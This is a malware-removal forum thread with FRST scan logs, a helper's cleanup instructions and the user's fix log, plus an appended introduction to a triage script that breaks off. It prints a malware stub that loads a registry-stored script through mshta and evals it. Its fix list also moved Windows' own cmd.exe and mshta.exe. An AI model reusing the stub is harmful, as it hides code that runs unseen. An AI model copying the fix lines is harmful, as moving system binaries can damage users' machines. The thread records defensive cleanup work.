FirewallRules: [WinCollab-DFSR-In-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [{352B8529-2E81-42C2-A8DC-68C32F775569}] => (Allow) C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe
StandardProfile\AuthorizedApplications: [C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service

==================== Restore Points =========================

29-07-2016 15:09:11 Windows Update
30-07-2016 14:25:33 Scheduled Checkpoint
31-07-2016 13:41:36 Scheduled Checkpoint
31-07-2016 21:21:19 Restore Operation
01-08-2016 10:24:14 Scheduled Checkpoint

==================== Faulty Device Manager Devices =============

Name: Camera
Description: Camera
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (08/02/2016 10:15:47 AM) (Source: Windows Search Service) (EventID: 3079) (User: )
Description: Notifications for the volume f:\ are not active.

Context: Windows Application

Details:
    The device is not ready.   (0x80070015)

Error: (08/02/2016 07:17:49 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SCOTT\APPDATA\LOCAL\MOZILLA\FIREFOX\PROFILES\TCDP74MY.DEFAULT-1470081235988\SAFEBROWSING-TO_DELETE> in the hash map cannot be updated.

Context:  Application, SystemIndex Catalog

Details:
    A device attached to the system is not functioning.   (0x8007001f)

Error: (08/01/2016 05:39:49 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 2046530

Error: (08/01/2016 05:39:49 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 2046530

Error: (08/01/2016 05:39:49 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (08/01/2016 05:39:48 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 2045423

Error: (08/01/2016 05:39:48 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 2045423

Error: (08/01/2016 05:39:48 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (08/01/2016 05:39:47 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 2044424

Error: (08/01/2016 05:39:47 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 2044424


System errors:
=============
Error: (08/01/2016 12:13:27 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1068McNaiAnn{C90134D2-4AE9-407A-919A-4A2EF09C6C51}

Error: (08/01/2016 12:13:27 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1068McNaiAnn{DC7EF8E1-824F-4110-AB43-1604DA9B4F40}

Error: (08/01/2016 12:09:55 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Network List ServiceNetwork Location Awareness%%1068 = The dependency service or group failed to start.


Error: (08/01/2016 12:09:55 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Network List ServiceNetwork Location Awareness%%1068 = The dependency service or group failed to start.


Error: (08/01/2016 12:09:55 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Network List ServiceNetwork Location Awareness%%1068 = The dependency service or group failed to start.


Error: (08/01/2016 12:09:55 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Network List ServiceNetwork Location Awareness%%1068 = The dependency service or group failed to start.


Error: (08/01/2016 12:09:55 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: AFD
DfsC
mfehidk
NetBIOS
netbt
nsiproxy
PSched
RasAcd
rdbss
Smb
spldr
tdx
Wanarpv6
ws2ifsl

Error: (08/01/2016 12:09:55 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: McAfee Proxy ServiceMcAfee Firewall Core Service%%1068 = The dependency service or group failed to start.


Error: (08/01/2016 12:09:55 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: McAfee Personal Firewall ServiceMcAfee Firewall Core Service%%1068 = The dependency service or group failed to start.


Error: (08/01/2016 12:09:55 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Network List ServiceNetwork Location Awareness%%1068 = The dependency service or group failed to start.



CodeIntegrity:
===================================
  Date: 2016-08-02 12:08:53.896
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-02 12:08:53.337
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-02 12:08:52.763
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-02 12:08:52.196
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-02 12:07:28.530
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-02 12:07:27.964
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-02 12:07:27.283
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-02 12:07:26.654
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-07-31 04:32:48.304
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-07-31 04:32:47.321
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel® Core™ Duo CPU T2350 @ 1.86GHz
Percentage of memory in use: 63%
Total physical RAM: 2549.44 MB
Available physical RAM: 937.09 MB
Total Virtual: 5315.66 MB
Available Virtual: 3414.07 MB

==================== Drives ================================

Drive c: (ACER) (Fixed) (Total:70.62 GB) (Free:24.65 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (ACERDATA) (Fixed) (Total:70.61 GB) (Free:65.37 GB) NTFS
Drive f: (TOSHIBA EXT) (Fixed) (Total:465.66 GB) (Free:426.95 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 149.1 GB) (Disk ID: AFC5AFC5)
Partition 1: (Not Active) - (Size=7.8 GB) - (Type=12)
Partition 2: (Active) - (Size=70.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=70.6 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 465.8 GB) (Disk ID: 4A7EB801)
Partition 1: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

 

 

 



#2 Aura (Malware Response Team)

Posted 02 August 2016 - 11:53 AM

Hi vistanovice :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name; it's up to you! Now that we've broken the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lengthy, so it's normal for me not to reply right after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens;
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you not to seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you;
  • The same principle applies to any modifications you make to your system: I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system;
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here; better safe than sorry!;
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of it as fast as we can, before it makes unknown changes to the system. This being said, I would appreciate it if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced;
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not; I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules;
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate it if you let me know about it first, and if you need, I can also assist you in the process;
  • I would appreciate it if you were to stay with me until the end, which means until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone;
  • Since I'm still a trainee, all my posts have to be reviewed by an instructor prior to being posted to make sure that you receive the best assistance possible. Sorry for the inconvenience. This being said, I have a full-time job, and I also have night classes on Mondays and Wednesdays, which means that if you reply during these two days, it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread;
This being said, it's time to clean up some malware, so let's get started, shall we? :)

Please give me a few hours to review your logs and come up with a reply.

Thank you!

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 vistanovice (Topic Starter)

Posted 02 August 2016 - 12:00 PM

Thanks Aura. I'm in standby mode.



#4 Aura (Malware Response Team)

Posted 02 August 2016 - 02:11 PM

Thank you for waiting!

Malicious Programs Warning!

I noticed that you have malicious programs installed on your system. I'll ask you to uninstall them since uninstalling such programs before running malware removal tools will ensure a better clean-up.
  • QuickShare
If you have an issue when uninstalling a program, please let me know.

We'll start with a first FRST fix, followed by a quick sweep with JRT and AdwCleaner. Follow the instructions below please.

Farbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Right-click on your Desktop, select New and click on Text Document. Name it fixlist (make sure it's a .txt file) and press Enter;
  • Open the file you just created and copy/paste the content below in it, then save it (Ctrl + S);
    CloseProcesses:
    CreateRestorePoint:
    
    HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\Run: [**rplp<*>] => "C:\Users\Scott\AppData\Local\88f2fc\209cb6.lnk" <===== ATTENTION (Value Name with invalid characters)
    Startup: C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a898e3.lnk [2016-08-02]
    ShortcutTarget: a898e3.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
    Startup: C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dff6bb.lnk [2016-08-02]
    ShortcutTarget: dff6bb.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
    BootExecute: autocheck autochk /p \??\F:autocheck autochk * sasnative32
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
    
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    URLSearchHook: HKLM - (No Name) - {f0e98552-8e47-4c6c-9b3a-11ab0549f94d} -  No File
    SearchScopes: HKLM -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2102} URL = hxxp://dts.search.ask.com/sr?src=ieb&gct=ds&appid=136&systemid=102&v=a14978-572&apn_uid=0461180772134103&apn_dtid=BND102&o=APN10646&apn_ptnrs=AG7&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002 -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2102} URL = hxxp://dts.search.ask.com/sr?src=ieb&gct=ds&appid=136&systemid=102&v=a14978-572&apn_uid=0461180772134103&apn_dtid=BND102&o=APN10646&apn_ptnrs=AG7&q={searchTerms}
    Toolbar: HKLM - No Name - {ba00b7b1-0351-477a-b948-23e3ee5a73d4} -  No File
    Toolbar: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
    
    FF Plugin: @exent.com/npExentCtl,version=7.0.0.0 -> C:\Program Files\Free Ride Games\npExentCtl.dll [No File]
    FF Plugin: www.exent.com/GameTreatWidget -> C:\Program Files\Free Ride Games\NPGameTreatPlugin.dll [No File]
    
    S3 ADASPROT; \??\C:\Program Files\Advanced System Optimizer 3\adasprot32.sys [X]
    S3 catchme; \??\C:\Users\Scott\AppData\Local\Temp\catchme.sys [X]
    S3 EraserUtilDrv11010; \??\C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilDrv11010.sys [X]
    S3 lv321av; system32\DRIVERS\lv321av.sys [X]
    S3 SymIMMP; system32\DRIVERS\SymIM.sys [X]
    
    Task: {009FF3C0-2C63-45C9-9B64-43C4F90DF8E4} - System32\Tasks\LaunchSignup => C:\Program Files\MyPC Backup\Signup Wizard.exe <==== ATTENTION
    Task: {46915187-2476-47E8-A559-AC136E5B9623} - \Updater26278.exe -> No File <==== ATTENTION
    Task: {620CA66F-41E3-47CB-BEBA-F53DCCFBE17C} - System32\Tasks\{7405A8FC-F14B-4911-951F-71D63B7EBC89} => pcalua.exe -a "C:\Program Files\QuickTime\QTSystem\QuickTime.cpl" -c QuickTime
    Task: {86DCA0FE-8E5A-4673-8256-4A44E3D4BE2A} - System32\Tasks\{361D96D2-3953-46A8-9C2E-9F6695CD3A7C} => pcalua.exe -a E:\setup.exe -d E:\
    
    HKLM\...\cmdfile\DefaultIcon: %SystemRoot%\System32\imageres.dll,-68 <===== ATTENTION
    HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\Software\Classes\5e097f: "C:\Windows\system32\mshta.exe" "javascript:oB2RUH="oGt";mN71=new ActiveXObject("WScript.Shell");unRi22V="qmhHM";w0TVp=mN71.RegRead("HKCU\\software\\jiun\\thufoby");sh9jvJ="vImph";eval(w0TVp);z83FTbxB="RntD";" <===== ATTENTION
    
    REG: REG DELETE "HKEY_CURRENT_USER\SOFTWARE\jiun" /f
    CMD: TYPE "C:\Users\Scott\AppData\Local\88f2fc\6da7a4.bat"
    
    C:\Program Files\Advanced System Optimizer 3
    C:\Program Files\Free Ride Games
    C:\Program Files\MyPC Backup
    C:\Program Files\Common Files\Symantec Shared
    C:\Users\Scott\AppData\Local
    C:\Users\Scott\AppData\Local\88f2fc\209cb6.lnk
    C:\Users\Scott\AppData\Local\88f2fc\6da7a4.bat
    C:\Users\Scott\AppData\Roaming\0a30ba
    C:\Windows\system32\DRIVERS\lv321av.sys
    C:\Windows\system32\DRIVERS\SymIM.sys
    
    EmptyTemp:
    
  • Right-click on the FRST executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Click on the Fix button;
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad;
  • Copy and paste its content in your next reply;
Junkware Removal Tool (JRT)
  • Download Junkware Removal Tool (JRT) and move it to your Desktop;
  • Right-click on JRT.exe and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Press any key to launch the scan and let it complete;
  • Once the scan is complete, a log will open. Please copy/paste the content of the output log in your next reply;
AdwCleaner - Fix Mode
  • Download AdwCleaner and move it to your Desktop;
  • Right-click on AdwCleaner.exe and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the EULA (I accept), let the database update, then click on Scan;
  • Let the scan complete. Once it's done, make sure that every item listed in the different tabs is checked and click on the Cleaning button. This will kill all the active processes;
  • Once the cleaning process is complete, AdwCleaner will ask to restart your computer; do it;
  • After the restart, a log will open when logging in. Please copy/paste the content of that log in your next reply;
Your next reply(ies) should therefore contain:
  • Confirmation that you uninstalled the program listed above (if not, let me know);
  • Copy/pasted content of the FRST fixlog.txt;
  • Copy/pasted JRT log;
  • Copy/pasted AdwCleaner clean log;



#5 vistanovice (Topic Starter)

Posted 02 August 2016 - 04:46 PM

Aura,

I cannot find a program called Quickshare. I ran a search and the filename didn't appear - the only thing close to it is Quicktime. Can you help?



#6 Aura (Malware Response Team)

Posted 02 August 2016 - 04:51 PM

QuickShare is an installed program, therefore you need to uninstall it from the Control Panel, under "Uninstall a program". If you don't see it listed there, you can move on to the next set of instructions, we'll address it later :)



#7 vistanovice (Topic Starter)

Posted 02 August 2016 - 07:56 PM

Ran FRST.

But unable to open JRT. Tried to download & extract 3 times. I get the error message attached. The 3rd time, I got a file in Chinese on my desktop.

I haven't run Adaware until you let me know whether to proceed without running the JRT.

Here's the FRST log.

Fix result of Farbar Recovery Scan Tool (x86) Version: 27-07-2016
Ran by Scott (2016-08-02 20:22:18) Run:1
Running from C:\Users\Scott\Desktop
Loaded Profiles: Scott (Available Profiles: Scott)
Boot Mode: Normal

==============================================

fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:

HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\Run: [**rplp<*>] => "C:\Users\Scott\AppData\Local\88f2fc\209cb6.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a898e3.lnk [2016-08-02]
ShortcutTarget: a898e3.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dff6bb.lnk [2016-08-02]
ShortcutTarget: dff6bb.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
BootExecute: autocheck autochk /p \??\F:autocheck autochk * sasnative32
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
URLSearchHook: HKLM - (No Name) - {f0e98552-8e47-4c6c-9b3a-11ab0549f94d} -  No File
SearchScopes: HKLM -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2102} URL = hxxp://dts.search.ask.com/sr?src=ieb&gct=ds&appid=136&systemid=102&v=a14978-572&apn_uid=0461180772134103&apn_dtid=BND102&o=APN10646&apn_ptnrs=AG7&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002 -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2102} URL = hxxp://dts.search.ask.com/sr?src=ieb&gct=ds&appid=136&systemid=102&v=a14978-572&apn_uid=0461180772134103&apn_dtid=BND102&o=APN10646&apn_ptnrs=AG7&q={searchTerms}
Toolbar: HKLM - No Name - {ba00b7b1-0351-477a-b948-23e3ee5a73d4} -  No File
Toolbar: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File

FF Plugin: @exent.com/npExentCtl,version=7.0.0.0 -> C:\Program Files\Free Ride Games\npExentCtl.dll [No File]
FF Plugin: www.exent.com/GameTreatWidget -> C:\Program Files\Free Ride Games\NPGameTreatPlugin.dll [No File]

S3 ADASPROT; \??\C:\Program Files\Advanced System Optimizer 3\adasprot32.sys [X]
S3 catchme; \??\C:\Users\Scott\AppData\Local\Temp\catchme.sys [X]
S3 EraserUtilDrv11010; \??\C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilDrv11010.sys [X]
S3 lv321av; system32\DRIVERS\lv321av.sys [X]
S3 SymIMMP; system32\DRIVERS\SymIM.sys [X]

Task: {009FF3C0-2C63-45C9-9B64-43C4F90DF8E4} - System32\Tasks\LaunchSignup => C:\Program Files\MyPC Backup\Signup Wizard.exe <==== ATTENTION
Task: {46915187-2476-47E8-A559-AC136E5B9623} - \Updater26278.exe -> No File <==== ATTENTION
Task: {620CA66F-41E3-47CB-BEBA-F53DCCFBE17C} - System32\Tasks\{7405A8FC-F14B-4911-951F-71D63B7EBC89} => pcalua.exe -a "C:\Program Files\QuickTime\QTSystem\QuickTime.cpl" -c QuickTime
Task: {86DCA0FE-8E5A-4673-8256-4A44E3D4BE2A} - System32\Tasks\{361D96D2-3953-46A8-9C2E-9F6695CD3A7C} => pcalua.exe -a E:\setup.exe -d E:\

HKLM\...\cmdfile\DefaultIcon: %SystemRoot%\System32\imageres.dll,-68 <===== ATTENTION
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\Software\Classes\5e097f: "C:\Windows\system32\mshta.exe" "javascript:oB2RUH="oGt";mN71=new ActiveXObject("WScript.Shell");unRi22V="qmhHM";w0TVp=mN71.RegRead("HKCU\\software\\jiun\\thufoby");sh9jvJ="vImph";eval(w0TVp);z83FTbxB="RntD";" <===== ATTENTION

REG: REG DELETE "HKEY_CURRENT_USER\SOFTWARE\jiun" /f
CMD: TYPE "C:\Users\Scott\AppData\Local\88f2fc\6da7a4.bat"

C:\Program Files\Advanced System Optimizer 3
C:\Program Files\Free Ride Games
C:\Program Files\MyPC Backup
C:\Program Files\Common Files\Symantec Shared
C:\Users\Scott\AppData\Local
C:\Users\Scott\AppData\Local\88f2fc\209cb6.lnk
C:\Users\Scott\AppData\Local\88f2fc\6da7a4.bat
C:\Users\Scott\AppData\Roaming\0a30ba
C:\Windows\system32\DRIVERS\lv321av.sys
C:\Windows\system32\DRIVERS\SymIM.sys

EmptyTemp:
*****************

Processes closed successfully.
Restore point was successfully created.
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\Software\Microsoft\Windows\CurrentVersion\Run\\**rplp<*> => value could not remove. Error in Deleting Value: C0000034
C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a898e3.lnk => moved successfully
C:\Windows\System32\cmd.exe => moved successfully
C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dff6bb.lnk => moved successfully
C:\Windows\System32\mshta.exe => moved successfully
hklm\System\CurrentControlSet\Control\Session Manager\\BootExecute => value restored successfully
"HKLM\SOFTWARE\Policies\Google" => key removed successfully.
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully.
"HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully.
HKLM\Software\Microsoft\Internet Explorer\URLSearchHooks\\{f0e98552-8e47-4c6c-9b3a-11ab0549f94d} => value removed successfully.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2102}" => key removed successfully.
HKCR\CLSID\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2102} => key not found.
"HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2102}" => key removed successfully.
HKCR\CLSID\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2102} => key not found.
HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{ba00b7b1-0351-477a-b948-23e3ee5a73d4} => value removed successfully.
HKCR\CLSID\{ba00b7b1-0351-477a-b948-23e3ee5a73d4} => key not found.
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => value removed successfully.
HKCR\CLSID\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => key not found.
"HKLM\Software\MozillaPlugins\@exent.com/npExentCtl,version=7.0.0.0" => key removed successfully.
"HKLM\Software\MozillaPlugins\www.exent.com/GameTreatWidget" => key removed successfully.
ADASPROT => service removed successfully.
catchme => service removed successfully.
EraserUtilDrv11010 => service removed successfully.
lv321av => service removed successfully.
SymIMMP => service removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{009FF3C0-2C63-45C9-9B64-43C4F90DF8E4}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{009FF3C0-2C63-45C9-9B64-43C4F90DF8E4}" => key removed successfully.
C:\Windows\System32\Tasks\LaunchSignup => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchSignup" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{46915187-2476-47E8-A559-AC136E5B9623}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{46915187-2476-47E8-A559-AC136E5B9623}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Updater26278.exe" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{620CA66F-41E3-47CB-BEBA-F53DCCFBE17C}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{620CA66F-41E3-47CB-BEBA-F53DCCFBE17C}" => key removed successfully.
C:\Windows\System32\Tasks\{7405A8FC-F14B-4911-951F-71D63B7EBC89} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7405A8FC-F14B-4911-951F-71D63B7EBC89}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{86DCA0FE-8E5A-4673-8256-4A44E3D4BE2A}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{86DCA0FE-8E5A-4673-8256-4A44E3D4BE2A}" => key removed successfully.
C:\Windows\System32\Tasks\{361D96D2-3953-46A8-9C2E-9F6695CD3A7C} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{361D96D2-3953-46A8-9C2E-9F6695CD3A7C}" => key removed successfully.
HKLM\Software\Classes\cmdfile\DefaultIcon\\Default => value restored successfully
"HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\Software\Classes\5e097f" => key removed successfully.

========= REG DELETE "HKEY_CURRENT_USER\SOFTWARE\jiun" /f =========



========= End of Reg: =========


========= TYPE "C:\Users\Scott\AppData\Local\88f2fc\6da7a4.bat" =========


========= End ofCMD: =========

"C:\Program Files\Advanced System Optimizer 3" => not found.
"C:\Program Files\Free Ride Games" => not found.
"C:\Program Files\MyPC Backup" => not found.
C:\Program Files\Common Files\Symantec Shared => moved successfully
"C:\Users\Scott\AppData\Local" => Warning: FRST is scripted not to move this directory.
C:\Users\Scott\AppData\Local\88f2fc\209cb6.lnk => moved successfully
C:\Users\Scott\AppData\Local\88f2fc\6da7a4.bat => moved successfully
C:\Users\Scott\AppData\Roaming\0a30ba => moved successfully
"C:\Windows\system32\DRIVERS\lv321av.sys" => not found.
"C:\Windows\system32\DRIVERS\SymIM.sys" => not found.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 76223406 B
Java, Flash, Steam htmlcache => 558546 B
Windows/system/drivers => 4713206 B
Edge => 0 B
Chrome => 0 B
Firefox => 199641143 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 33125 B
Public => 0 B
ProgramData => 0 B
systemprofile => 918091 B
LocalService => 66228 B
NetworkService => 66228 B
Scott => 113056971 B

RecycleBin => 0 B
EmptyTemp: => 385 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 20:24:54 ====
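
The fixlist in post #4 and the fixlog above show the whole persistence chain on this machine: a Run value whose name FRST flags as containing invalid characters (and which the fixlog could not delete, error C0000034), two Startup shortcuts pointing at the signed cmd.exe and mshta.exe, a Software\Classes key whose default value is an mshta javascript: stub that does nothing but RegRead a second-stage script from HKCU\software\jiun\thufoby and eval it (hence the REG DELETE of HKCU\SOFTWARE\jiun in the fix), and, back in Addition.txt, a driver with a random hex name that Code Integrity cannot verify. The Python below is an added example, not part of this thread, of FRST or of BleepingComputer's tooling: it re-parses those same log lines (embedded as a constructed sample) and reports, for each indicator, what else a fix has to remove. The names triage, Finding and LOLBINS and the random-hex-name heuristic for driver files are this example's own assumptions.

```python
"""Triage of FRST log lines for the persistence chain seen in this thread.

Added example for this page; it is not part of the thread, of FRST, or of any
BleepingComputer tooling. It re-reads lines quoted from the logs above and
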